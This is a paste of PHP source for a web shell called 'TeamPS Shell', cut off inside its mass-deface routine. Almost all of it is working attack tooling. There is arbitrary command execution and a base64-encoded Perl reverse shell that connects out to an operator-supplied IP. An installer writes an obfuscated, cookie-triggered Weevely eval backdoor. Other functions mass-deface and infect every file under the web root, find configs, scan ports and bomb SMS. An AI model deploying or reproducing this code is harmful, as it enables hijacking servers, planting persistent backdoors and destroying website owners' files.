· 6 years ago · Aug 13, 2019, 06:58 AM
1<?php
2//TeamPS Shell
3//By Plum & KrypTiK
4error_reporting(0);
5#chdir('');
6//Some basic var's
7if (!@$_GET['path']) {
8 $dir = CleanDir(getcwd());
9} else {
10 $dir = CleanDir($_GET['path']);
11}
12$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
13$domain = $_SERVER['HTTP_HOST'];
14$script = $_SERVER['SCRIPT_NAME'];
15$full_url = $_SERVER['REQUEST_URI'];
16$script2 = basename($script);
17$serverip = $_SERVER['SERVER_ADDR'];
18$userip = $_SERVER['REMOTE_ADDR'];
19$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
20$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
21$disabled = ini_get('disable_functions');
22//Perl back connect script by LorD
23//Encoded in base64 for convenience
24$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
25@ini_set("memory_limit", "9999M");
26@ini_set("max_execution_time", "0");
27@ini_set("upload_max_filesize", "9999m");
28@ini_set("magic_quotes_gpc", "0");
29@set_magic_quotes_runtime(0);
30set_time_limit(0);
31if (empty($disabled)) {
32 $disabled = "None";
33}
34//Some functions
35function CleanDir($directory) {
36 $directory = str_replace("\\", "/", $directory);
37 $directory = str_replace("//", "/", $directory);
38 return $directory;
39}
40function success($for, $var1) {
41 $domain = $_SERVER['HTTP_HOST'];
42 $script = $_SERVER['SCRIPT_NAME'];
43 $full_url = $_SERVER['REQUEST_URI'];
44 if ($for == "filesave") {
45 $message = "File Saved!";
46 $redirect = "http://$domain$script?path=$var1";
47 }
48 if ($for == "filedelete") {
49 $message = "File Deleted!";
50 $redirect = "http://$domain$script?path=$var1";
51 }
52 if ($for == "createdir") {
53 $message = "Directory Created!";
54 $redirect = "http://$domain$script?path=$var1";
55 }
56 if ($for == "dir_exists") {
57 $message = "Directory Already Exists!";
58 $redirect = "http://$domain$script?path=$var1";
59 }
60 if ($for == "file_exists") {
61 $message = "File Already Exists!";
62 $redirect = "http://$domain$script?editfile=$var1";
63 }
64 if ($for == "file_created") {
65 $message = "File Created!";
66 $redirect = "http://$domain$script?editfile=$var1";
67 }
68 if ($for == "file_uploaded") {
69 $message = "File Uploaded!";
70 $redirect = "http://$domain$full_url";
71 }
72 if ($for == "shell_killed") {
73 $message = "Shell Killed!";
74 $redirect = "http://$domain$script";
75 }
76 if ($for == "dir_del") {
77 $message = "Directory Deleted!";
78 $redirect = "http://$domain$script?path=$var1";
79 }
80 if ($for == "dir_renamed") {
81 $message = "Directory Renamed!";
82 $redirect = "http://$domain$script?path=$var1";
83 }
84 if ($for == "file_renamed") {
85 $message = "File Renamed!";
86 $redirect = "http://$domain$script?path=$var1";
87 }
88 if ($for == "configs_found") {
89 $message = "$var1 Configs Found!";
90 $redirect = "";
91 }
92 if ($for == "unzip") {
93 $message = "Successfully Unzipped File!";
94 $redirect = "http://$domain$script?path=$var1";
95 }
96 if ($for == "files_found") {
97 $message = "$var1 files found!";
98 $redirect = "";
99 }
100 if ($for == "weevely") {
101 $message = "Weevely BackDoor Installed!";
102 $redirect = "";
103 }
104 echo "<div id='xbox'><embed
105 src='http://p0wersurge.com/js/achievementnopic.swf'
106 width='300'
107 height='80'
108 flashvars='Text=$message&gs=1337'
109 wmode='transparent'/></div>";
110 if (empty($redirect)) {
111 echo "<script>
112function remove (){
113 document.getElementById('xbox').innerHTML='';
114}
115setInterval(function(){remove();}, 2700);
116</script>";
117 } else {
118 echo "<script>
119function remove (){
120 window.location = '$redirect'
121}
122setInterval(function(){remove();}, 2500);
123</script>";
124 }
125}
126function error($mesg) {
127 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
128 echo "$error";
129}
130function ByteConversion($bytes, $precision = 2) {
131 $kilobyte = 1024;
132 $megabyte = $kilobyte * 1024;
133 $gigabyte = $megabyte * 1024;
134 $terabyte = $gigabyte * 1024;
135 if (($bytes >= 0) && ($bytes < $kilobyte)) {
136 return $bytes . ' B';
137 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
138 return round($bytes / $kilobyte, $precision) . ' KB';
139 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
140 return round($bytes / $megabyte, $precision) . ' MB';
141 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
142 return round($bytes / $gigabyte, $precision) . ' GB';
143 } elseif ($bytes >= $terabyte) {
144 return round($bytes / $terabyte, $precision) . ' TB';
145 } else {
146 return $bytes . ' B';
147 }
148}
149//Mass File Function
150function files($mass_dir) {
151 if ($dh = opendir($mass_dir)) {
152 $files = array();
153 $inner_files = array();
154 while ($file = readdir($dh)) {
155 if ($file != "." && $file != ".." && $file[0] != '.') {
156 if (is_dir($mass_dir . "/" . $file)) {
157 $inner_files = files("$mass_dir/$file");
158 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
159 } else {
160 array_push($files, "$mass_dir/$file");
161 }
162 }
163 }
164 closedir($dh);
165 return $files;
166 }
167}
168//Execute command
169function cmd2($cmd, $path) {
170 chdir($path);
171 $disabled = ini_get('disable_functions');
172 if (empty($disabled)) {
173 $disabled = "None";
174 }
175 if ($disabled == "None") {
176 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
177 while (!feof($io[1])) {
178 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
179 }
180 while (!feof($io[2])) {
181 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
182 }
183 fclose($io[1]);
184 fclose($io[2]);
185 proc_close($execute);
186 return $res;
187 } elseif (function_exists("proc_open")) {
188 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
189 while (!feof($io[1])) {
190 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
191 }
192 while (!feof($io[2])) {
193 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
194 }
195 fclose($io[1]);
196 fclose($io[2]);
197 proc_close($execute);
198 return $res;
199 } elseif (function_exists("exec")) {
200 $res = exec($cmd);
201 return $res;
202 } elseif (function_exists("system")) {
203 $res = system($cmd);
204 return $res;
205 } elseif (function_exists("shell_exec")) {
206 $res = shell_exec($cmd);
207 return $res;
208 } elseif (function_exists("passthru")) {
209 $res = passthru($cmd);
210 return $res;
211 } else {
212 error("The necessary functions to execute commands are disabled!");
213 }
214}
215//Salt generator
216function gen_salt($length) {
217 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
218 $i = 0;
219 $salt = "";
220 while ($i < $length) {
221 $arrand = array_rand($characters, 1);
222 $salt.= $characters[$arrand];
223 $i++;
224 }
225 return $salt;
226}
227//Unzip function
228function unzip($filename, $directory) {
229 $zip = new ZipArchive;
230 $res = $zip->open($filename);
231 if ($res === TRUE) {
232 $zip->extractTo($directory);
233 $zip->close();
234 success("unzip", $directory);
235 } else {
236 cmd2("unzip $filename", $directory);
237 }
238}
239//Get files and directories and throw them into an array.
240$open = opendir($dir);
241$files = array();
242$direcs = array();
243while ($file = readdir($open)) {
244 if ($file != "." && $file != "..") {
245 if (is_dir("$dir/$file")) {
246 array_push($direcs, $file);
247 } else {
248 array_push($files, $file);
249 }
250 }
251}
252asort($direcs);
253asort($files);
254//echo out header
255echo "<pre>
256<center>
257<font size='2' color='#14ab00'>
258TTTTTTTTTTTTTTTTTTTTTTT PPPPPPPPPPPPPPPPP SSSSSSSSSSSSSSS
259T:::::::::::::::::::::T P::::::::::::::::P SS:::::::::::::::S
260T:::::::::::::::::::::T P::::::PPPPPP:::::P S:::::SSSSSS::::::S
261T:::::TT:::::::TT:::::T PP:::::P P:::::PS:::::S SSSSSSS
262TTTTTT T:::::T TTTTTTeeeeeeeeeeee aaaaaaaaaaaaa mmmmmmm mmmmmmm P::::P P:::::PS:::::S
263 T:::::T ee::::::::::::ee a::::::::::::a mm:::::::m m:::::::mm P::::P P:::::PS:::::S
264 T:::::T e::::::eeeee:::::eeaaaaaaaaa:::::a m::::::::::mm::::::::::m P::::PPPPPP:::::P S::::SSSS
265 T:::::T e::::::e e:::::e a::::a m::::::::::::::::::::::m P:::::::::::::PP SS::::::SSSSS
266 T:::::T e:::::::eeeee::::::e aaaaaaa:::::a m:::::mmm::::::mmm:::::m P::::PPPPPPPPP SSS::::::::SS
267 T:::::T e:::::::::::::::::e aa::::::::::::a m::::m m::::m m::::m P::::P SSSSSS::::S
268 T:::::T e::::::eeeeeeeeeee a::::aaaa::::::a m::::m m::::m m::::m P::::P S:::::S
269 T:::::T e:::::::e a::::a a:::::a m::::m m::::m m::::m P::::P S:::::S
270 TT:::::::TT e::::::::e a::::a a:::::a m::::m m::::m m::::mPP::::::PP SSSSSSS S:::::S
271 T:::::::::T e::::::::eeeeeeeea:::::aaaa::::::a m::::m m::::m m::::mP::::::::P S::::::SSSSSS:::::S
272 T:::::::::T ee:::::::::::::e a::::::::::aa:::am::::m m::::m m::::mP::::::::P S:::::::::::::::SS
273 TTTTTTTTTTT eeeeeeeeeeeeee aaaaaaaaaa aaaammmmmm mmmmmm mmmmmmPPPPPPPPPP SSSSSSSSSSSSSSS
274<a class ='navbar' href='http://p0wersurge.com'>p0wersurge</a> ©2012 Plum & KrypTiK
275
276</font>
277</center>
278</pre>";
279//echo out system info misc bar
280echo "<table border='1' width='100%'>
281<tr>
282<th>User</th>
283<th>System</th>
284<th>Server Software</th>
285<th>safe_mode</th>
286<th>open_basedir</th>
287<th>Disable Functions</th>
288<th>Your IP</th>
289<th>Server IP</th>
290</tr>";
291$system = php_uname();
292$software = $_SERVER['SERVER_SOFTWARE'];
293if (strpos($software, "Win") != FALSE) {
294 $whoami = strstr($whoami, "\\");
295 $whoami = substr($whoami, 1);
296}
297$safemode = ini_get('safe_mode');
298if ($safemode) {
299 $safemode = "Enabled";
300} else {
301 $safemode = "Disabled";
302}
303$openbase = ini_get('open_basedir');
304if ($openbase) {
305 $openbase = "Enabled";
306} else {
307 $openbase = "Disabled";
308}
309echo "<tr>
310<td>$whoami</td>
311<td>$system</td>
312<td>$software</td>
313<td>$safemode</td>
314<td>$openbase</td>
315<td>$disabled</td>
316<td>$userip</td>
317<td>$serverip</td>
318</tr>
319</table>
320<br>";
321//Navbar will go here.
322//Basic for now
323echo "<center><font size='4' color='#14ab00'><b>
324[~<a href='http://$domain$script' class='navbar'>Home</a>~]
325[~<a href='http://$domain$script?installMySQL' class='navbar'>Install MSD</a>~]
326[~<a href='http://$domain$script?massdeface' class='navbar'>Mass Deface</a>~]
327[~<a href='http://$domain$script?massinfect' class='navbar'>Mass File Infect</a>~]
328[~<a href='http://$domain$script?config' class='navbar'>Config Finder</a>~]
329[~<a href='http://$domain$script?search' class='navbar'>File Search</a>~]
330[~<a href='http://$domain$script?encrypt' class='navbar'>Encrypt String</a>~]
331[~<a href='http://$domain$script?kill' class='navbar'>Kill</a>~]<br>
332</font>
333<font size='3.5' color='#14ab00'>
334[~<a href='http://$domain$script?sms' class='navbar'>SMS Bomber</a>~]
335[~<a href='http://$domain$script?domaininfo' class='navbar'>Domain Information</a>~]
336[~<a href='http://$domain$script?back' class='navbar'>Back Connect</a>~]
337[~<a href='http://$domain$script?weev' class='navbar'>Weevely Backdoor</a>~]
338[~<a href='http://$domain$script?symlink' class='navbar'>Symlink</a>~]
339[~<a href='http://$domain$script?scan' class='navbar'>Port Scan</a>~]
340</b></font></center><br>";
341//End navbar
342//Anything you want echo'd out between misc system bar
343//and misc file bar put below here!
344//Back connect
345if (isset($_GET['back'])) {
346 echo "
347 <form method='POST'>
348 <center>
349 <font color='#14ab00'>
350 IP: <input type='text' class='text' name='ip' value='$userip' />
351 Port: <input type='text' class='text' name='port' value='2121' size='3'/><br>
352 <input type='submit' name='backC' value='Connect' />
353 </font>
354 </center>
355 </form>
356 ";
357 if (isset($_POST['backC'])) {
358 $port = $_POST['port'];
359 $bcip = $_POST['ip'];
360 $bc_decode = base64_decode($bcperl_source);
361 if (is_dir('/tmp')) {
362 if (file_put_contents("/tmp/bc.pl", $bc_decode)) {
363 $bc_command = "perl /tmp/bc.pl $bcip $port";
364 cmd2($bc_command, $dir);
365 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
366 } else {
367 error("Failed to write perl script to /tmp!");
368 }
369 } elseif (is_writeable($dir)) {
370 if (file_put_contents("$dir/bc.pl", $bc_decode)) {
371 $bc_command = "perl $dir/bc.pl $bcip $port";
372 cmd2($bc_command, $dir);
373 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
374 } else {
375 error("Failed to write perl script to $dir!");
376 }
377 } else {
378 error("/tmp does not exist and current directory is not writable!");
379 }
380 }
381}
382//Weevely backdoor
383if (isset($_GET['weev'])) {
384 echo "<center><font color='#14ab00' size='3'>
385<form action='' method='post'>
386Directory to install weevely backdoor:<br>
387<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
388Name of file (something .php):<br>
389<input type='text' name='weev_name' class='text' value='weevely.php'><br>
390Password (more than 3 characters):<br>
391<input type='text' name='weev_pass' class='text'><br>
392<input type='submit' name='install_weev' value='BackDoor'><br>
393</font>
394</center>";
395}
396if (isset($_POST['install_weev'])) {
397 $weevdir = rtrim($_POST['weev_dir'], '/');;
398 $weevname = $_POST['weev_name'];
399 $weevpassword = $_POST['weev_pass'];
400 if (strlen($weevpassword) < 3) {
401 error("Password must be longer than 3 characters!");
402 } else {
403 $first2 = $weevpassword[0] . $weevpassword[1];
404 $rest = substr($weevpassword, 2);
405 $money = "$";
406 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
407 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
408 $weevelybd3 = "$money" . "k='$rest';";
409 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
410 $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
411 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
412 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
413 success("weevely");
414 } else {
415 error("Failed to write backdoor to $weevdir");
416 }
417 }
418}
419//Edit file stuff
420if (!empty($_GET['editfile'])) {
421 $edfile = $_GET['editfile'];
422 $redirectloc = dirname($edfile);
423 echo "<form method='POST'><center>";
424 if (file_exists($edfile)) {
425 if (get_magic_quotes_gpc()) {
426 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
427 } else {
428 $file_content = htmlspecialchars(file_get_contents($edfile));
429 }
430 if (is_writeable($edfile)) {
431 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#000000'>$file_content</textarea>
432<br><br>
433 <input type='submit' name='savedit' value='Save' />
434 <input type='submit' name='deletefile' value='Delete' />
435 </form></center>";
436 if (isset($_POST['savedit'])) {
437 if (get_magic_quotes_gpc()) {
438 $edfilecontent = stripslashes($_POST['edfile_contents']);
439 } else {
440 $edfilecontent = $_POST['edfile_contents'];
441 }
442 if (file_put_contents($edfile, $edfilecontent)) {
443 success("filesave", rtrim($redirectloc, "/"));
444 } else {
445 error("Failed to save file!");
446 }
447 } else if (isset($_POST['deletefile'])) {
448 if (unlink($edfile)) {
449 success("filedelete", rtrim($redirectloc, '/'));
450 } else {
451 error("Failed to delete file!");
452 }
453 }
454 } else {
455 echo "<font color='red'><b>File is read only!</b></font><br>
456<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
457 }
458 echo "</center>";
459 } else {
460 echo "<form method='POST'><center>";
461 echo "<font color='red'><b>File does not exist!</b></font><br>
462<textarea rows='20' cols='150' name='newfile_contents' style='color:#000'>
463</textarea><br><br>
464 <input type='submit' name='savefile' value='Create File' /><br /><br />
465 </form></center>";
466 if (isset($_POST['savefile'])) {
467 if (get_magic_quotes_gpc()) {
468 $newfilecontent = stripslashes($_POST['newfile_contents']);
469 } else {
470 $newfilecontent = $_POST['newfile_contents'];
471 }
472 if (file_put_contents($edfile, $newfilecontent)) {
473 success("filesave", rtrim($redirectloc, "/"));
474 } else {
475 error("Failed to save file!");
476 }
477 }
478 }
479}
480//Make directory stuff
481if (isset($_POST['do_create_dir'])) {
482 $cdir = $_POST['create_dir'];
483 if (is_dir($cdir)) {
484 success("dir_exists", $cdir);
485 } else {
486 if (mkdir($cdir, 0777)) {
487 success("createdir", $cdir);
488 } else {
489 error("Directory was not created!");
490 }
491 }
492}
493//Make file stuff
494if (isset($_POST['do_create_file'])) {
495 $cfile = $_POST['create_file'];
496 if (file_exists($cfile)) {
497 success("file_exists", $cfile);
498 } else {
499 if (fopen($cfile, "w+")) {
500 success("file_created", $cfile);
501 } else {
502 error("File was not created");
503 }
504 }
505}
506//Go directory
507if (isset($_POST['do_go_dir'])) {
508 $godir = $_POST['go_dir'];
509 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
510}
511//Go Edit file
512if (isset($_POST['do_go_edit'])) {
513 $gefile = $_POST['go_edit_file'];
514 if (file_exists($gefile)) {
515 header("Location: http://$domain$script?editfile=$gefile");
516 } else {
517 error("File does not exist!");
518 }
519}
520//Upload File
521if (isset($_POST['do_upload_file'])) {
522 $udir = $_POST['upload_location'];
523 $uname = $_FILES['upload_file']['name'];
524 $both = "$udir$uname";
525 if (file_exists($both)) {
526 success("file_exists", $both);
527 } else {
528 switch ($_FILES['upload_file']['error']) {
529 case 0:
530 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
531 success("file_uploaded");
532 } else {
533 error("Failed To Upload File!");
534 }
535 }
536 }
537}
538//Kill Shell
539if (isset($_GET['kill'])) {
540 if (unlink("$dir/$script2")) {
541 success("shell_killed");
542 } else {
543 error("Failed to kill shell!");
544 }
545}
546//Install MySQL Tool
547if (isset($_GET['installMySQL'])) {
548 echo "<center>
549<font size='4'>
550<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
551<br>
552<br>
553<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
554</font>
555</center>
556<br>";
557}
558//MSD 1 stuff
559if (isset($_GET['msd1'])) {
560 echo "<center>
561<font color='#14ab00' size='3'>
562Directory to install to:<br>
563If directory does not exist it will attempt to create it.
564<form action='' method='post'>
565<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
566<input type='submit' name='installmsd1' value='Install'>
567<form>
568</font>
569</center>
570<br>";
571}
572if (isset($_POST['installmsd1'])) {
573 $msd1dir = rtrim($_POST['msd1dir'], "/");
574 $msd1dir2 = "$msd1dir/msdv2.zip";
575 if (!is_dir($msd1dir)) {
576 if (!mkdir($msd1dir, 0777)) {
577 error("Failed to make directory $msd1dir");
578 }
579 }
580 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
581 if (file_put_contents($msd1dir2, $link)) {
582 unzip($msd1dir2, $msd1dir);
583 } else {
584 error("Could not write to $msd1dir");
585 }
586}
587//MSD 2 stuff
588if (isset($_GET['msd2'])) {
589 echo "<center>
590<font color='#14ab00' size='3'>
591Directory to install to:<br>
592If directory does not exist it will attempt to create it.
593<form action='' method='post'>
594<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
595<input type='submit' name='installmsd2' value='Install'>
596<form>
597</font>
598</center>
599<br>";
600}
601if (isset($_POST['installmsd2'])) {
602 $msd2dir = rtrim($_POST['msd2dir'], "/");
603 $msd2dir2 = "$msd2dir/msd.zip";
604 if (!is_dir($msd2dir)) {
605 if (!mkdir($msd2dir, 0777)) {
606 error("Failed to make directory $msd2dir");
607 }
608 }
609 $link = file_get_contents("http://p0wersurge.com/msd.zip");
610 if (file_put_contents($msd2dir2, $link)) {
611 unzip($msd2dir2, $msd2dir);
612 } else {
613 error("Could not write to $msd2dir");
614 }
615}
616//Delete Directory
617if (isset($_GET['deldir'])) {
618 $deldir = $_GET['deldir'];
619 $redir = dirname($deldir);
620 if (rmdir($deldir)) {
621 success("dir_del", rtrim($redir, '/'));
622 } else {
623 error("Failed to delete directory!");
624 }
625}
626//Rename Directory
627if (isset($_GET['rendir'])) {
628 $rendir = $_GET['rendir'];
629 $dend = $_GET['old'];
630 echo "<center>
631<form action='' method='post'>
632<input type='text' class='text' name='new_dir_name' value='$dend'>
633<input type='submit' name='do_rename_dir' value='Rename'>
634</center>";
635}
636if (isset($_POST['do_rename_dir'])) {
637 $newdir = $_POST['new_dir_name'];
638 $rendir = $_GET['rendir'];
639 $dend = $_GET['old'];
640 if (rename("$rendir/$dend", "$rendir/$newdir")) {
641 success("dir_renamed", $rendir);
642 } else {
643 error("Directory was not renamed!");
644 }
645}
646//Delete file
647if (isset($_GET['delfile'])) {
648 $delfile = $_GET['delfile'];
649 $redir = dirname($delfile);
650 if (unlink($delfile)) {
651 success("filedelete", rtrim($redir, '/'));
652 } else {
653 error("Failed to delete file!");
654 }
655}
656//Rename File
657if (isset($_GET['renfile'])) {
658 $renfile = $_GET['renfile'];
659 $fend = $_GET['old'];
660 echo "<center>
661<form action='' method='post'>
662<input type='text' class='text' name='new_file_name' value='$fend'>
663<input type='submit' name='do_rename_file' value='Rename'>
664</center>";
665}
666if (isset($_POST['do_rename_file'])) {
667 $newfile = $_POST['new_file_name'];
668 $renfile = $_GET['renfile'];
669 $fend = $_GET['old'];
670 if (rename("$renfile/$fend", "$renfile/$newfile")) {
671 success("file_renamed", $renfile);
672 } else {
673 error("File was not renamed!");
674 }
675}
676//Mass Files Stuff
677if (isset($_POST['mass_files'])) {
678 $action = $_POST['mass_action'];
679 $chmodvalue = $_POST['chmod_value'];
680 $box = $_POST['delbox'];
681 if ($action == "Delete") {
682 foreach ($box as $b) {
683 if (is_dir($b)) {
684 if (rmdir($b)) {
685 echo "<font color='green'>Deleted Directory: $b</font><br>";
686 } else {
687 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
688 }
689 } else {
690 if (unlink($b)) {
691 echo "<font color='green'>Deleted File: $b</font><br>";
692 } else {
693 echo "<font color='red'>Failed To Delete file: $b</font><br>";
694 }
695 }
696 }
697 }
698 if ($action == "chmod") {
699 foreach ($box as $b) {
700 if (is_dir($b)) {
701 if (chmod($b, $chmodvalue)) {
702 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
703 } else {
704 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
705 }
706 } else {
707 if (chmod($b, $chmodvalue)) {
708 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
709 } else {
710 echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
711 }
712 }
713 }
714 }
715}
716//Mass Defacer
717if (isset($_POST['do_mass_deface'])) {
718 if (get_magic_quotes_gpc()) {
719 $mass_source = stripslashes($_POST['massdeface_source']);
720 } else {
721 $mass_source = $_POST['massdeface_source'];
722 }
723 $def_dir = $_POST['deface_dir'];
724 $custom_dir = $_POST['custom_dir'];
725 $custom_dir = rtrim($custom_dir, "/");
726 $failed = 0;
727 $success = 0;
728 if (empty($mass_source)) {
729 error("You must enter a source!");
730 } elseif (empty($custom_dir) && $def_dir == "custom") {
731 error("You must enter a custom directory when using the Custom option!");
732 } else {
733 if ($def_dir == "root") {
734 $mddir = $rootdir;
735 }
736 if ($def_dir == "custom") {
737 $mddir = $custom_dir;
738 }
739 foreach (files($mddir) as $key => $file) {
740 $file2 = trim($file, ".");
741 if ("$file2" == "$dir/$script2") {
742 echo "";
743 } else {
744 if (file_put_contents("$file2", $mass_source)) {
745 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
746 $success++;
747 } else {
748 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
